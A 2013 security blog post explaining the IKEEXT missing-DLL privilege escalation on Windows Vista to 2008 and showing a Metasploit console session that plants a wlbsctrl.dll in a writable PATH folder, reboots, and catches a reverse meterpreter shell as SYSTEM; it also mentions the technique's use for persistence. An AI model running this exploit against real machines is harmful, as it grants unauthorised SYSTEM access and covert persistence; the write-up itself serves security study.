Thursday, 5 September 2013

IKEEXT Windows Local Privilege Escalation

A while ago High-Tech Bridge posted a notification of an issue affecting Vista to 2008 (the service exists in Windows 8 but I haven't checked it) which leads to a Local Privilege Escalation to SYSTEM.

Basically the IKEEXT service, which is often set to 'Automatic' start is missing the wlbsctrl.dll and Microsoft have no intention of fixing it. To exploit this vulnerability another weakness must be present on the box. The %PATH% must contain a user writeable folder (or one the user can create). By creating the missing DLL even if the user cannot start the service they will likely be able to reboot the machine, catching the SYSTEM shell when it reboots.

msf exploit(ikeext_service) > exploit -j
[*] Exploit running as background job.

[*] Started reverse handler on 
[*] Checking service exists...
[!] UAC is enabled, may get false negatives on writable folders.
[*] Checking %PATH% folders for write access...
[*] Path C:\Windows\System32\WindowsPowerShell\v1.0\ does not exist...
[*] Path C:\Program Files\Microsoft Windows Performance Toolkit\ does not exist...
[+] Write permissions in c:\bin - RW
[*] Writing 14336 bytes to c:\bin\wlbsctrl.dll...
[*] Launching service IKEEXT...
[*] Unable to start service, handler running waiting for a reboot...
sessions -i 3
[*] Starting interaction with 3...

meterpreter > reboot
meterpreter > 
[*] - Meterpreter session 3 closed.  Reason: Died

[*] Sending stage (752128 bytes) to
[*] Meterpreter session 4 opened ( -> at 2013-09-05 23:04:03 +0100
[+] Deleted c:\bin\wlbsctrl.dll
msf exploit(ikeext_service) > sessions -l

Active sessions

  Id  Type                   Information                     Connection
  --  ----                   -----------                     ----------
  4   meterpreter x86/win32  NT AUTHORITY\SYSTEM @ IE11WIN7 -> (

This exploit could also be a sneaky persistence technique... and don't forget to switch targets for x64 systems.

You can find other exploits using techniques like this from Mubix, or more in-depth coverage can be found on If you don't understand how bypassuac works then this is also worth a read.

No comments:

Post a Comment